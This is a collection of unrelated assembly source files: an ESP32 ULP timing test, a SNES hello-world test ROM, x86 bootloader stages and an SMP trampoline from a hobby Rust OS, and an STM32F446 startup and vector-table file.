JUMP_0F_TEST(jump 0f, ov) // 27
// jump imm eq with equal
sub r0, r0, r0
JUMP_0F_TEST(jump 0f, eq) // 28
// jump imm eq without equal
add r0, r2, 1
JUMP_0F_TEST(jump 0f, eq) // 29
move r0, 5
// jumpr lt with jump
JUMP_0F_TEST(jumpr 0f, 10, lt) // 30
// jumpr lt without jump
JUMP_0F_TEST(jumpr 0f, 1, lt) // 31
// jumpr ge with jump
JUMP_0F_TEST(jumpr 0f, 1, ge) // 32
// jumpr ge without jump
JUMP_0F_TEST(jumpr 0f, 10, ge) // 33
stage_rst
stage_inc 5
// jumps le with jump
JUMP_0F_TEST(jumps 0f, 10, le) // 34
// jumps le without jump
JUMP_0F_TEST(jumps 0f, 1, le) // 35
// jumps lt with jump
JUMP_0F_TEST(jumps 0f, 10, lt) // 36
// jumps lt without jump
JUMP_0F_TEST(jumps 0f, 1, lt) // 37
// jumps ge with jump
JUMP_0F_TEST(jumps 0f, 1, ge) // 38
// jumps ge without jump
JUMP_0F_TEST(jumps 0f, 10, ge) // 39
// cannot test halt instruction
// wake up the esp32
TEST(wake) // 40
// choose the ulp's sleep timer
TEST(sleep 0) // 41
// wait for n cycles
TEST(wait 0) // 42
TEST(wait 1) // 43
TEST(wait 2) // 44
TEST(wait 10) // 45
// adc times vary by settings, not testing here
// i2c times vary, not testing here
// read from rtc register
TEST(reg_rd 257, 26, 26) // 46
// write to rtc register
TEST(HIGH()) // 47
jump tests // loop!
end:
jump end
.data
loop_count:
.int LOOPS
.bss
test_data:
.int 0
|
mp3/ccsnes | 2,932 | tests/hello_world.s | ; Simple SNES Hello World Test ROM
; This creates a minimal ROM that displays "HELLO" on screen
.include "snes.inc"
.segment "HEADER"
.byte "HELLO WORLD TEST " ; Title (21 bytes)
.byte $30 ; LoROM, FastROM
.byte $00 ; No chips
.byte $08 ; ROM size (256KB)
.byte $00 ; No RAM
.byte $00 ; Japan
.byte $33 ; Nintendo
.byte $00 ; Version
.word $0000 ; Checksum complement
.word $FFFF ; Checksum
.segment "VECTORS"
.word 0, 0 ; Native mode interrupts (unused)
.word 0, 0, 0
.word 0, 0
.word Reset ; Reset vector
.segment "CODE"
Reset:
sei ; Disable interrupts
clc ; Clear carry
xce ; Switch to native mode
rep #$30 ; 16-bit A/X/Y
; Setup stack
ldx #$1FFF
txs
; Clear registers
lda #$0000
tcd ; Direct page = 0
; Turn off screen
sep #$20 ; 8-bit A
lda #$8F
sta $2100 ; Screen off
; Setup video mode
lda #$09
sta $2105 ; Mode 1, BG3 priority
; Setup BG1 tilemap
lda #$00
sta $2107 ; BG1 tilemap at VRAM $0000
; Setup BG1 tiles
lda #$01
sta $210B ; BG1 tiles at VRAM $1000
; Clear VRAM
rep #$20
lda #$0000
sta $2116 ; VRAM address
ldx #$8000 ; Clear 32KB
ClearVRAM:
stz $2118
dex
bne ClearVRAM
; Upload font tiles
lda #$1000
sta $2116 ; VRAM address for tiles
ldx #$0000
UploadFont:
lda FontData,x
sta $2118
inx
inx
cpx #$0100 ; 16 tiles * 8 bytes each
bne UploadFont
; Write "HELLO" to tilemap
lda #$0000
sta $2116 ; VRAM address
; H
lda #$0048
sta $2118
; E
lda #$0045
sta $2118
; L
lda #$004C
sta $2118
; L
lda #$004C
sta $2118
; O
lda #$004F
sta $2118
; Turn on screen
sep #$20
lda #$0F
sta $2100 ; Screen on, full brightness
; Enable NMI
lda #$80
sta $4200
MainLoop:
wai ; Wait for interrupt
bra MainLoop
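; Tilemap entries written above are 16-bit words laid out as
; vhopppcc cccccccc (v/h flip, o = priority, ppp = palette, c = tile index),
; so a value like $0048 selects tile $48 with palette 0 and no flips.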
; Simple font data (partial ASCII)
FontData:
; Tile $45 - 'E'
.byte $7E, $40, $40, $7C, $40, $40, $7E, $00
.byte $00, $00, $00, $00, $00, $00, $00, $00
; Tile $48 - 'H'
.byte $42, $42, $42, $7E, $42, $42, $42, $00
.byte $00, $00, $00, $00, $00, $00, $00, $00
; Tile $4C - 'L'
.byte $40, $40, $40, $40, $40, $40, $7E, $00
.byte $00, $00, $00, $00, $00, $00, $00, $00
; Tile $4F - 'O'
.byte $3C, $42, $42, $42, $42, $42, $3C, $00
.byte $00, $00, $00, $00, $00, $00, $00, $00 |
mpeco/rust-os | 8,452 | bootloader/src/asm/stage2.s | .section .second_stage, "awx"
.code16
stage2_start:
mov si, offset second_stage_string
call bios_println
a20_line_enable:
call check_a20_line
test ax, ax
jnz a20_line_enabled
call a20_line_kcontroller_enable
call check_a20_line
test ax, ax
jnz a20_line_enabled
call a20_line_bios_enable
call check_a20_line
test ax, ax
jnz a20_line_enabled
call a20_line_fast_enable
call check_a20_line
test ax, ax
jnz a20_line_enabled
jmp error_enable_a20
a20_line_enabled:
nop
get_memory_map:
xor bp, bp # used to keep count of entries
xor ebx, ebx
mov di, offset memory_map+0x4 #0x9000+0x4 = 0x9004
mov edx, 0x534D4150
mov eax, 0xE820
mov ecx, 24
mov dword ptr es:[di+20], 1 # force ACPI 3.x entry
int 0x15
jc error_memory_map # function not supported
mov edx, 0x534D4150 # register may be trashed?
cmp eax, edx
jne error_memory_map
test ebx, ebx
jz error_memory_map
jmp mm_handle_entry
mm_get_entry:
mov eax, 0xE820
mov ecx, 24
mov dword ptr es:[di+20], 1 # force ACPI 3.x entry
int 0x15
jc mm_finish # if carry is set list finished
mov edx, 0x534D4150 # register may be trashed?
mm_handle_entry:
jcxz mm_skip_entry # cx = 0 means 0 length entry
cmp cx, 20
jbe mm_handle_entry2
test dword ptr es:[di+20], 1
jz mm_skip_entry # if ignore bit is clear skip entry
mm_handle_entry2:
mov eax, es:[di+8]
or eax, es:[di+12]
jz mm_skip_entry # if length of entry is 0 skip it
inc bp
add di, 24
mm_skip_entry:
test ebx, ebx
jnz mm_get_entry # if ebx is 0 end of list
mm_finish:
mov es:[offset memory_map], bp # store entry count at start
clc # clear carry flag
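# Layout of each stored entry, for reference (24 bytes, ACPI 3.0 style):
#   +0  u64 base address
#   +8  u64 length in bytes
#   +16 u32 type (1 = usable RAM, 2 = reserved, ...)
#   +20 u32 extended attributes (bit 0 = entry valid)
# The entry count ends up at [memory_map]; entries start at +4.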
vesa:
vesa_get_info:
mov ax, 0x4F00
mov di, offset vbe_info_structure
int 0x10
cmp ax, 0x4F
jne error_vbe # VBE not supported
mov si, [vbe_info_structure_video_mode_ptr] # offset
mov ax, [vbe_info_structure_video_mode_ptr+2] # segment
mov fs, ax
sub si, 2
vesa_search_mode:
add si, 2
mov cx, fs:[si]
cmp cx, 0xFFFF
je error_vbe_mode_not_found
vesa_get_mode_info:
push esi
mov ax, 0x4F01
mov di, offset vbe_mode_info_structure
int 0x10
pop esi
cmp ax, 0x4F
jne error_vbe
vesa_check_mode:
# check if bpp of mode is 24 FIXME: make configurable
cmp byte ptr [vbe_mode_info_structure_bpp], 24
jne vesa_search_mode
# check if width of mode is 800 FIXME: make configurable
cmp byte ptr [vbe_mode_info_structure_width], 800
jne vesa_search_mode
# check if height of mode is 600 FIXME: make configurable
cmp byte ptr [vbe_mode_info_structure_height], 600
jne vesa_search_mode
# check memory model is direct color
cmp byte ptr [vbe_mode_info_structure_memory_model], 6
jne vesa_search_mode
# check if linear framebuffer bit is set
mov ax, [vbe_mode_info_structure_attributes]
test ax, 0x80
jz vesa_search_mode
vesa_set_mode:
mov bx, cx
or bx, 0x4000 # enable linear framebuffer
mov ax, 0x4F02
int 0x10
cmp ax, 0x4F
jne error_vbe
get_vga_bitmap_font:
# save segment registers
push ds
push es
# address returned in es:bp
mov ax, 0x1130
mov bh, 0x6
int 0x10
# set ds:si to bitmap fonts address
push es
pop ds
mov si, bp
# set es:di to buffer
pop es # restore es
mov di, offset vga_bitmap_font
# move dword from ds:si to es:di 1024 times (4k bytes)
mov cx, 0x400
rep movsd
# restore ds
pop ds
enter_unreal_mode:
cli
push es
lgdt [gdt_descriptor] # load global descriptor table
# enter protected mode
mov eax, cr0
or al, 1
mov cr0, eax
# load descriptor 2 on es
mov bx, 0x10
mov es, bx
# leave protected mode
and al, 0xFE
mov cr0, eax
pop es
sti
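# Unreal-mode trick, summarized: loading es with a flat 4 GiB descriptor
# while briefly in protected mode leaves that limit in the hidden segment
# cache after dropping back to real mode, so later code can address the
# full 32-bit space through es.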
load_kernel:
mov ax, offset kernel_loading_buffer
mov word ptr [dap_transfer_buffer], ax
mov ax, offset _binary_kernel_elf_start
mov bx, offset stage1_start
sub ax, bx
shr ax, 9 # divide by 512
mov word ptr [dap_starting_lba], ax
mov word ptr [dap_num_sectors], 1
mov edi, offset kernel_addr
# number of sectors in kernel
mov ecx, offset _binary_kernel_elf_size
add ecx, 511 # align up
shr ecx, 9 # divide by 512
load_kernel_sector:
mov si, offset dap
mov ah, 0x42
mov dl, [drive_code] # restore drive code
int 0x13
# move from buffer to destination
push ecx
mov esi, offset kernel_loading_buffer
mov ecx, 512/4
rep movsd [edi], [esi]
pop ecx
# next iteration
mov ax, [dap_starting_lba]
inc ax
mov [dap_starting_lba], ax
dec ecx
jnz load_kernel_sector
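# Each sector is read by INT 13h into a low-memory bounce buffer, then
# copied with a 32-bit 'rep movsd' (made possible by unreal mode above) to
# the kernel's final load address, which may lie above 1 MiB.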
enter_protected_mode:
cli
lgdt [gdt_descriptor] # load global descriptor table
# enter protected mode
mov eax, cr0
or al, 1
mov cr0, eax
# load descriptor 2 in segment registers
mov bx, 0x10
mov ds, bx
mov es, bx
mov ss, bx
# loads CS with 0x8 (descriptor 1 in GDT) and jumps to stage 3
ljmp 0x8, offset stage3_start
# a20 line routines:
# checks if a20 line is enabled, returns 1 on ax if so or 0 otherwise
check_a20_line:
push es
mov ax, 0xFFFF
mov es, ax
mov si, 0x500
mov di, 0x510
mov al, byte ptr ds:[si]
push ax
mov al, byte ptr es:[di]
push ax
mov byte ptr ds:[si], 0x00
mov byte ptr es:[di], 0xFF
cmp byte ptr ds:[si], 0xFF
pop ax
mov byte ptr es:[di], al
pop ax
mov byte ptr ds:[si], al
mov ax, 0
je check_a20_line_disabled # if equal wrap around happened which means a20 line is disabled
check_a20_line_enabled:
mov ax, 1
check_a20_line_disabled:
pop es
ret
a20_line_bios_enable:
mov ax, 0x2403 # check if method is supported
int 0x15
jc a20_line_bios_enable_ret
test ah, ah
jnz a20_line_bios_enable_ret
mov ax, 0x2401 # try to enable
int 0x15
a20_line_bios_enable_ret:
ret
a20_line_kcontroller_enable:
call a20_line_kcontroller_wait
mov al, 0xD1
out 0x64, al
call a20_line_kcontroller_wait
mov al, 0xDF
out 0x60, al
call a20_line_kcontroller_wait
ret
a20_line_kcontroller_wait:
in al, 0x64
test al, 0x2
jnz a20_line_kcontroller_wait
ret
a20_line_fast_enable:
in al, 0x92
test al, 0x2 # check if bit 1 is already on
jnz a20_line_fast_enable_ret
or al, 0x2
and al, 0xFE # guarantee bit 0 isn't written to (resets)
out 0x92, al
a20_line_fast_enable_ret:
ret
# errors routines:
error_enable_a20:
mov bx, offset error_enable_a20_string
jmp error_print
error_memory_map:
mov bx, offset error_memory_map_string
jmp error_print
error_vbe:
mov bx, offset error_vbe_string
jmp error_print
error_vbe_mode_not_found:
mov bx, offset error_vbe_mode_not_found_string
jmp error_print
# data structures:
# VESA info structure
vbe_info_structure:
vbe_info_structure_signature: .ascii "VBE2" # will later be changed to "VESA" once filled
vbe_info_structure_version: .word 0
vbe_info_structure_oem_str_ptr: .long 0 #.word 0 .word 0 # offset and segment
vbe_info_structure_capabilities: .long 0
vbe_info_structure_video_mode_ptr: .long 0 #.word 0 .word 0 # offset and segment
vbe_info_structure_software_rev: .word 0
vbe_info_structure_vendor: .long 0
vbe_info_structure_product_name: .long 0
vbe_info_structure_product_rev: .long 0
vbe_info_structure_reserved: .skip 222, 0
vbe_info_structure_oem_data: .skip 256, 0
# VESA mode info structure
vbe_mode_info_structure:
vbe_mode_info_structure_attributes: .word 0
.skip 16, 0 # not used here
vbe_mode_info_structure_width: .word 0
vbe_mode_info_structure_height: .word 0
.skip 3, 0 # not used here
vbe_mode_info_structure_bpp: .byte 0
.skip 1, 0
vbe_mode_info_structure_memory_model: .byte 0
.skip 12, 0 # not used here
vbe_mode_info_structure_framebuffer_addr: .long 0
.skip 212, 0 # not used here
# strings:
second_stage_string: .asciz "Booting second stage..."
error_enable_a20_string: .asciz "Failed to enable A20 line."
error_memory_map_string: .asciz "Failed to get memory map."
error_vbe_string: .asciz "VESA function not supported/failed."
error_vbe_mode_not_found_string: .asciz "VESA video mode specified in config not found."
|
mpeco/rust-os | 3,381 | bootloader/src/asm/stage1.s | .section .first_stage, "awx"
.global stage1_start
.code16
stage1_start:
cld # clear direction flag
# initialize segment registers
xor ax, ax
mov es, ax
mov fs, ax
mov gs, ax
mov ds, ax
mov ss, ax
mov sp, 0x7C00 # initialize the stack
mov [drive_code], dl # stores drive code
mov si, offset first_stage_string
call bios_println
set_bios_long_mode:
mov ax, 0xEC00
mov bx, 2
int 0x15
check_int13h_extensions:
mov ah, 0x41
mov bx, 0x55AA
int 0x13
jc error_int13h_extensions_not_supported
load_rest_of_bootloader:
mov bx, 0x7E00 # 0x07C0:0x0200 (512 bytes from start)
mov word ptr [dap_transfer_buffer], bx
mov ax, offset end_addr_bootloader
sub ax, bx # end - start
add ax, 511 # align up
shr ax, 9 # divide by 512
mov word ptr [dap_num_sectors], ax
mov word ptr [dap_starting_lba], 1 # FIXME: In case MBR chainloading
mov si, offset dap
mov ah, 0x42
mov dl, [drive_code] # restore drive code
int 0x13
jc error_load_rest_of_bootloader
jmp stage2_start
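# The DAP set up above asks INT 13h/AH=42h to read
# ceil((end_addr_bootloader - 0x7E00) / 512) sectors starting at LBA 1,
# placing them at 0x7E00, right after this already-loaded boot sector.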
# print routines:
# string in si
bios_println:
call bios_print
mov al, 0xA # line Feed
call bios_write_character
mov al, 0xD # carriage Return
call bios_write_character
ret
# string in si
bios_print:
cld
bios_print_loop:
lodsb
test al, al
jz bios_print_return
call bios_write_character
jmp bios_print_loop
bios_print_return:
ret
# char in al
bios_write_character:
mov ah, 0xE
int 0x10
ret
# errors routines:
# string in bx
error_print:
mov si, offset error_string
call bios_print
mov si, bx
call bios_println
spin:
jmp spin
error_cpuid_not_supported:
mov bx, offset error_cpuid_not_supported_string
jmp error_print
error_longmode_not_supported:
mov bx, offset error_longmode_not_supported_string
jmp error_print
error_int13h_extensions_not_supported:
mov bx, offset error_int13h_extensions_string
jmp error_print
error_load_rest_of_bootloader:
mov bx, offset error_load_rest_of_bootloader_string
jmp error_print
# data structures:
# global descriptor table descriptor
gdt_descriptor:
.word gdt_end - gdt - 1 # size of gdt
.long gdt # start of gdt
# global descriptor table
gdt:
.quad 0
# code descriptor
.byte 0xff
.byte 0xff
.byte 0
.byte 0
.byte 0
.byte 0x9a
.byte 0xcf
.byte 0
# data descriptor
.byte 0xff
.byte 0xff
.byte 0
.byte 0
.byte 0
.byte 0x92
.byte 0xcf
.byte 0
gdt_end:
# disk address packet
dap:
.byte 0x10 # size of packet
.byte 0x0 # unused
dap_num_sectors:
.word 0x0 # number of sectors to transfer
dap_transfer_buffer: # segment:offset
.word 0x0 # offset
.word 0x0 # segment
dap_starting_lba:
.quad 0x0
# store drive code from dl
drive_code: .byte 0
# strings:
first_stage_string: .asciz "Booting first stage..."
error_string: .asciz "ERROR: "
error_cpuid_not_supported_string: .asciz "CPUID not supported by CPU."
error_longmode_not_supported_string: .asciz "Long Mode not supported by CPU."
error_int13h_extensions_string: .asciz "INT13h Extensions not supported."
error_load_rest_of_bootloader_string: .asciz "Failed to load rest of bootloader."
# fill to 512 bytes
.org 510
.word 0xAA55 # bootable disk signature
|
mpeco/rust-os | 2,185 | kernel/src/x86_64/cpu/smp/asm/trampoline.s | # will be loaded on address 0x8000
.code16
trampoline_start:
cli
cld
xor ax, ax
mov ds, ax
# load global descriptor table
mov byte ptr [0x8034], 0xCF
lgdt [0x8020]
# enter protected mode
mov eax, cr0
or al, 1
mov cr0, eax
# jump to protected mode
ljmp 0x8, 0x8040
.org 0x20 # fill until 0x8020
# global descriptor table descriptor
gdt_descriptor_0x8020:
.word gdt_end - gdt - 1 # size of gdt
.long 0x8026 # start of gdt
.org 0x26 # 0x8026, directive to make sure address is correct when assembling
# global descriptor table
gdt:
.quad 0
# code descriptor
.byte 0xFF
.byte 0xFF
.byte 0
.byte 0
.byte 0
.byte 0x9A
.org 0x34 # 0x8034, directive to make sure address is correct when assembling
.byte 0
.byte 0
# data descriptor
.byte 0xFF
.byte 0xFF
.byte 0
.byte 0
.byte 0
.byte 0x92
.byte 0xCF
.byte 0
gdt_end:
.code32
.org 0x40 # fill until 0x8040
protected_mode_0x8040:
# move PML4 table address to cr3
mov eax, [0x8080]
mov cr3, eax
# flip PAE bit in cr4
mov eax, cr4
or eax, 0x20
mov cr4, eax
# set long mode and NXE bit
mov ecx, 0xC0000080
rdmsr
or eax, 0x900
wrmsr
# enable paging
mov eax, cr0
or eax, 0x80000000
mov cr0, eax
# update gdt for long mode and load it again
mov byte ptr [0x8034], 0xAF
lgdt [0x8020]
# jump to long mode
ljmp 0x8, 0x8100
.org 0x80 # fill until 0x8080
pml4_addr_0x8080: # will be filled by kernel
.quad 0x0
init_ap_fn_addr_0x8088: # will be filled by kernel
.quad 0x0
stack_top_addr_ptr_0x8090: # will be filled by kernel
.quad 0x0
trampoline_lock_addr_0x8098: # will be filled by kernel
.quad 0x0
.code64
.org 0x100 # fill until 0x8100
long_mode_0x8100:
mov rax, [0x8098]
trampoline_spin_loop: # wait for bsp
pause
cmp byte ptr [rax], 0
jnz trampoline_spin_loop
# setup stack
mov rax, [0x8090]
mov rsp, [rax]
# jump to "init_ap" in smp/mod.rs with stack top addr as 1st param (rdi)
mov rdi, rsp
mov rax, [0x8088]
jmp rax
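# Handoff sketch: the BSP fills the slots at 0x8080..0x8098 (PML4, AP entry
# function, stack-top pointer, lock), and each AP spins above until the
# kernel (presumably) zeroes its lock byte; the GDT granularity byte at
# 0x8034 is rewritten (0xCF -> 0xAF) to turn the 32-bit code descriptor
# into a long-mode one before the second lgdt.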
trampoline_end:
|
mrkayaalp/ad7708 | 24,397 | Core/Startup/startup_stm32f446retx.s | /**
******************************************************************************
* @file startup_stm32f446xx.s
* @author MCD Application Team
* @brief STM32F446xx Devices vector table for GCC based toolchains.
* This module performs:
* - Set the initial SP
* - Set the initial PC == Reset_Handler,
* - Set the vector table entries with the exceptions ISR address
* - Branches to main in the C library (which eventually
* calls main()).
* After Reset the Cortex-M4 processor is in Thread mode,
* priority is Privileged, and the Stack is set to Main.
******************************************************************************
* @attention
*
* Copyright (c) 2017 STMicroelectronics.
* All rights reserved.
*
* This software is licensed under terms that can be found in the LICENSE file
* in the root directory of this software component.
* If no LICENSE file comes with this software, it is provided AS-IS.
*
******************************************************************************
*/
.syntax unified
.cpu cortex-m4
.fpu softvfp
.thumb
.global g_pfnVectors
.global Default_Handler
/* start address for the initialization values of the .data section.
defined in linker script */
.word _sidata
/* start address for the .data section. defined in linker script */
.word _sdata
/* end address for the .data section. defined in linker script */
.word _edata
/* start address for the .bss section. defined in linker script */
.word _sbss
/* end address for the .bss section. defined in linker script */
.word _ebss
/* stack used for SystemInit_ExtMemCtl; always internal RAM used */
/**
* @brief This is the code that gets called when the processor first
* starts execution following a reset event. Only the absolutely
* necessary set is performed, after which the application
* supplied main() routine is called.
* @param None
* @retval : None
*/
.section .text.Reset_Handler
.weak Reset_Handler
.type Reset_Handler, %function
Reset_Handler:
ldr sp, =_estack /* set stack pointer */
/* Copy the data segment initializers from flash to SRAM */
ldr r0, =_sdata
ldr r1, =_edata
ldr r2, =_sidata
movs r3, #0
b LoopCopyDataInit
CopyDataInit:
ldr r4, [r2, r3]
str r4, [r0, r3]
adds r3, r3, #4
LoopCopyDataInit:
adds r4, r0, r3
cmp r4, r1
bcc CopyDataInit
/* Zero fill the bss segment. */
ldr r2, =_sbss
ldr r4, =_ebss
movs r3, #0
b LoopFillZerobss
FillZerobss:
str r3, [r2]
adds r2, r2, #4
LoopFillZerobss:
cmp r2, r4
bcc FillZerobss
/* Call the clock system initialization function.*/
bl SystemInit
/* Call static constructors */
bl __libc_init_array
/* Call the application's entry point.*/
bl main
bx lr
.size Reset_Handler, .-Reset_Handler
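/* Roughly equivalent C for the sequence above (an illustrative sketch,
 * assuming <string.h> and <stdint.h>):
 *   extern uint32_t _sidata[], _sdata[], _edata[], _sbss[], _ebss[];
 *   memcpy(_sdata, _sidata, (_edata - _sdata) * 4);
 *   memset(_sbss, 0, (_ebss - _sbss) * 4);
 *   SystemInit(); __libc_init_array(); main();
 */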
/**
* @brief This is the code that gets called when the processor receives an
* unexpected interrupt. This simply enters an infinite loop, preserving
* the system state for examination by a debugger.
* @param None
* @retval None
*/
.section .text.Default_Handler,"ax",%progbits
Default_Handler:
Infinite_Loop:
b Infinite_Loop
.size Default_Handler, .-Default_Handler
/******************************************************************************
*
* The minimal vector table for a Cortex M3. Note that the proper constructs
* must be placed on this to ensure that it ends up at physical address
* 0x0000.0000.
*
*******************************************************************************/
.section .isr_vector,"a",%progbits
.type g_pfnVectors, %object
.size g_pfnVectors, .-g_pfnVectors
g_pfnVectors:
.word _estack
.word Reset_Handler
.word NMI_Handler
.word HardFault_Handler
.word MemManage_Handler
.word BusFault_Handler
.word UsageFault_Handler
.word 0
.word 0
.word 0
.word 0
.word SVC_Handler
.word DebugMon_Handler
.word 0
.word PendSV_Handler
.word SysTick_Handler
/* External Interrupts */
.word WWDG_IRQHandler /* Window WatchDog */
.word PVD_IRQHandler /* PVD through EXTI Line detection */
.word TAMP_STAMP_IRQHandler /* Tamper and TimeStamps through the EXTI line */
.word RTC_WKUP_IRQHandler /* RTC Wakeup through the EXTI line */
.word FLASH_IRQHandler /* FLASH */
.word RCC_IRQHandler /* RCC */
.word EXTI0_IRQHandler /* EXTI Line0 */
.word EXTI1_IRQHandler /* EXTI Line1 */
.word EXTI2_IRQHandler /* EXTI Line2 */
.word EXTI3_IRQHandler /* EXTI Line3 */
.word EXTI4_IRQHandler /* EXTI Line4 */
.word DMA1_Stream0_IRQHandler /* DMA1 Stream 0 */
.word DMA1_Stream1_IRQHandler /* DMA1 Stream 1 */
.word DMA1_Stream2_IRQHandler /* DMA1 Stream 2 */
.word DMA1_Stream3_IRQHandler /* DMA1 Stream 3 */
.word DMA1_Stream4_IRQHandler /* DMA1 Stream 4 */
.word DMA1_Stream5_IRQHandler /* DMA1 Stream 5 */
.word DMA1_Stream6_IRQHandler /* DMA1 Stream 6 */
.word ADC_IRQHandler /* ADC1, ADC2 and ADC3s */
.word CAN1_TX_IRQHandler /* CAN1 TX */
.word CAN1_RX0_IRQHandler /* CAN1 RX0 */
.word CAN1_RX1_IRQHandler /* CAN1 RX1 */
.word CAN1_SCE_IRQHandler /* CAN1 SCE */
.word EXTI9_5_IRQHandler /* External Line[9:5]s */
.word TIM1_BRK_TIM9_IRQHandler /* TIM1 Break and TIM9 */
.word TIM1_UP_TIM10_IRQHandler /* TIM1 Update and TIM10 */
.word TIM1_TRG_COM_TIM11_IRQHandler /* TIM1 Trigger and Commutation and TIM11 */
.word TIM1_CC_IRQHandler /* TIM1 Capture Compare */
.word TIM2_IRQHandler /* TIM2 */
.word TIM3_IRQHandler /* TIM3 */
.word TIM4_IRQHandler /* TIM4 */
.word I2C1_EV_IRQHandler /* I2C1 Event */
.word I2C1_ER_IRQHandler /* I2C1 Error */
.word I2C2_EV_IRQHandler /* I2C2 Event */
.word I2C2_ER_IRQHandler /* I2C2 Error */
.word SPI1_IRQHandler /* SPI1 */
.word SPI2_IRQHandler /* SPI2 */
.word USART1_IRQHandler /* USART1 */
.word USART2_IRQHandler /* USART2 */
.word USART3_IRQHandler /* USART3 */
.word EXTI15_10_IRQHandler /* External Line[15:10]s */
.word RTC_Alarm_IRQHandler /* RTC Alarm (A and B) through EXTI Line */
.word OTG_FS_WKUP_IRQHandler /* USB OTG FS Wakeup through EXTI line */
.word TIM8_BRK_TIM12_IRQHandler /* TIM8 Break and TIM12 */
.word TIM8_UP_TIM13_IRQHandler /* TIM8 Update and TIM13 */
.word TIM8_TRG_COM_TIM14_IRQHandler /* TIM8 Trigger and Commutation and TIM14 */
.word TIM8_CC_IRQHandler /* TIM8 Capture Compare */
.word DMA1_Stream7_IRQHandler /* DMA1 Stream7 */
.word FMC_IRQHandler /* FMC */
.word SDIO_IRQHandler /* SDIO */
.word TIM5_IRQHandler /* TIM5 */
.word SPI3_IRQHandler /* SPI3 */
.word UART4_IRQHandler /* UART4 */
.word UART5_IRQHandler /* UART5 */
.word TIM6_DAC_IRQHandler /* TIM6 and DAC1&2 underrun errors */
.word TIM7_IRQHandler /* TIM7 */
.word DMA2_Stream0_IRQHandler /* DMA2 Stream 0 */
.word DMA2_Stream1_IRQHandler /* DMA2 Stream 1 */
.word DMA2_Stream2_IRQHandler /* DMA2 Stream 2 */
.word DMA2_Stream3_IRQHandler /* DMA2 Stream 3 */
.word DMA2_Stream4_IRQHandler /* DMA2 Stream 4 */
.word 0 /* Reserved */
.word 0 /* Reserved */
.word CAN2_TX_IRQHandler /* CAN2 TX */
.word CAN2_RX0_IRQHandler /* CAN2 RX0 */
.word CAN2_RX1_IRQHandler /* CAN2 RX1 */
.word CAN2_SCE_IRQHandler /* CAN2 SCE */
.word OTG_FS_IRQHandler /* USB OTG FS */
.word DMA2_Stream5_IRQHandler /* DMA2 Stream 5 */
.word DMA2_Stream6_IRQHandler /* DMA2 Stream 6 */
.word DMA2_Stream7_IRQHandler /* DMA2 Stream 7 */
.word USART6_IRQHandler /* USART6 */
.word I2C3_EV_IRQHandler /* I2C3 event */
.word I2C3_ER_IRQHandler /* I2C3 error */
.word OTG_HS_EP1_OUT_IRQHandler /* USB OTG HS End Point 1 Out */
.word OTG_HS_EP1_IN_IRQHandler /* USB OTG HS End Point 1 In */
.word OTG_HS_WKUP_IRQHandler /* USB OTG HS Wakeup through EXTI */
.word OTG_HS_IRQHandler /* USB OTG HS */
.word DCMI_IRQHandler /* DCMI */
.word 0 /* Reserved */
.word 0 /* Reserved */
.word FPU_IRQHandler /* FPU */
.word 0 /* Reserved */
.word 0 /* Reserved */
.word SPI4_IRQHandler /* SPI4 */
.word 0 /* Reserved */
.word 0 /* Reserved */
.word SAI1_IRQHandler /* SAI1 */
.word 0 /* Reserved */
.word 0 /* Reserved */
.word 0 /* Reserved */
.word SAI2_IRQHandler /* SAI2 */
.word QUADSPI_IRQHandler /* QuadSPI */
.word CEC_IRQHandler /* CEC */
.word SPDIF_RX_IRQHandler /* SPDIF RX */
.word FMPI2C1_EV_IRQHandler /* FMPI2C 1 Event */
.word FMPI2C1_ER_IRQHandler /* FMPI2C 1 Error */
.size g_pfnVectors, .-g_pfnVectors
/*******************************************************************************
*
* Provide weak aliases for each Exception handler to the Default_Handler.
* As they are weak aliases, any function with the same name will override
* this definition.
*
*******************************************************************************/
.weak NMI_Handler
.thumb_set NMI_Handler,Default_Handler
.weak HardFault_Handler
.thumb_set HardFault_Handler,Default_Handler
.weak MemManage_Handler
.thumb_set MemManage_Handler,Default_Handler
.weak BusFault_Handler
.thumb_set BusFault_Handler,Default_Handler
.weak UsageFault_Handler
.thumb_set UsageFault_Handler,Default_Handler
.weak SVC_Handler
.thumb_set SVC_Handler,Default_Handler
.weak DebugMon_Handler
.thumb_set DebugMon_Handler,Default_Handler
.weak PendSV_Handler
.thumb_set PendSV_Handler,Default_Handler
.weak SysTick_Handler
.thumb_set SysTick_Handler,Default_Handler
.weak WWDG_IRQHandler
.thumb_set WWDG_IRQHandler,Default_Handler
.weak PVD_IRQHandler
.thumb_set PVD_IRQHandler,Default_Handler
.weak TAMP_STAMP_IRQHandler
.thumb_set TAMP_STAMP_IRQHandler,Default_Handler
.weak RTC_WKUP_IRQHandler
.thumb_set RTC_WKUP_IRQHandler,Default_Handler
.weak FLASH_IRQHandler
.thumb_set FLASH_IRQHandler,Default_Handler
.weak RCC_IRQHandler
.thumb_set RCC_IRQHandler,Default_Handler
.weak EXTI0_IRQHandler
.thumb_set EXTI0_IRQHandler,Default_Handler
.weak EXTI1_IRQHandler
.thumb_set EXTI1_IRQHandler,Default_Handler
.weak EXTI2_IRQHandler
.thumb_set EXTI2_IRQHandler,Default_Handler
.weak EXTI3_IRQHandler
.thumb_set EXTI3_IRQHandler,Default_Handler
.weak EXTI4_IRQHandler
.thumb_set EXTI4_IRQHandler,Default_Handler
.weak DMA1_Stream0_IRQHandler
.thumb_set DMA1_Stream0_IRQHandler,Default_Handler
.weak DMA1_Stream1_IRQHandler
.thumb_set DMA1_Stream1_IRQHandler,Default_Handler
.weak DMA1_Stream2_IRQHandler
.thumb_set DMA1_Stream2_IRQHandler,Default_Handler
.weak DMA1_Stream3_IRQHandler
.thumb_set DMA1_Stream3_IRQHandler,Default_Handler
.weak DMA1_Stream4_IRQHandler
.thumb_set DMA1_Stream4_IRQHandler,Default_Handler
.weak DMA1_Stream5_IRQHandler
.thumb_set DMA1_Stream5_IRQHandler,Default_Handler
.weak DMA1_Stream6_IRQHandler
.thumb_set DMA1_Stream6_IRQHandler,Default_Handler
.weak ADC_IRQHandler
.thumb_set ADC_IRQHandler,Default_Handler
.weak CAN1_TX_IRQHandler
.thumb_set CAN1_TX_IRQHandler,Default_Handler
.weak CAN1_RX0_IRQHandler
.thumb_set CAN1_RX0_IRQHandler,Default_Handler
.weak CAN1_RX1_IRQHandler
.thumb_set CAN1_RX1_IRQHandler,Default_Handler
.weak CAN1_SCE_IRQHandler
.thumb_set CAN1_SCE_IRQHandler,Default_Handler
.weak EXTI9_5_IRQHandler
.thumb_set EXTI9_5_IRQHandler,Default_Handler
.weak TIM1_BRK_TIM9_IRQHandler
